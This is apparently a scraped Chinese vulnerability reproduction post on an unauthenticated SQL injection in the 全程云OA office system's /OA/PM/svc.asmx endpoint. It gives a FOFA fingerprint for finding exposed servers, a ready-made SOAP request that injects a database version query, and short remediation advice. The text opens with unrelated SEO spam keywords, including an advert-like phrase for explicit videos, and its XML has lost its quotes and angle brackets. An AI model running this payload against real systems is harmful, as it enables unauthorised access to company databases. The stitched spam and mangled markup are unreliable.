建材做网销哪个网站好,做爰全过程免费的视频凤凰网站,医院做网站的意义,wordpress 滑到底部自动加载0x01 产品简介 全程云OA为企业提供日常办公管理、公文管理、工作请示、汇报、档案、知识体系、预算控制等26个功能#xff0c;超过100多个子模块。为企业内部提供高效、畅通的信息渠道#xff0c;同时也能大力推动公司信息系统发展#xff0c;提高企业的办公自动化程度和综合…0x01 产品简介 全程云OA为企业提供日常办公管理、公文管理、工作请示、汇报、档案、知识体系、预算控制等26个功能超过100多个子模块。为企业内部提供高效、畅通的信息渠道同时也能大力推动公司信息系统发展提高企业的办公自动化程度和综合管理水平加快企业信息的流通提高企业市场竞争能力。
0x02 漏洞概述 由于全程云oa办公系统/OA/PM/svc.asmx页面参数过滤不当导致存在sql注入漏洞未授权的攻击者可利用该漏洞获取数据库中的敏感信息。
0x03 复现环境
FOFAbodyimages/yipeoplehover.png 0x04 漏洞复现
PoC
POST /OA/PM/svc.asmx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close?xml version1.0 encodingutf-8?
soap:Envelope xmlns:xsihttp://www.w3.org/2001/XMLSchema-instance xmlns:xsdhttp://www.w3.org/2001/XMLSchema xmlns:soaphttp://schemas.xmlsoap.org/soap/envelope/soap:BodyGetUsersInfo xmlnshttp://tempuri.org/userIdListselect version/userIdList/GetUsersInfo/soap:Body
/soap:Envelope
查询数据库版本 0x05 修复建议 使用预编译语句。
对进入数据库的特殊字符进行转义处理。
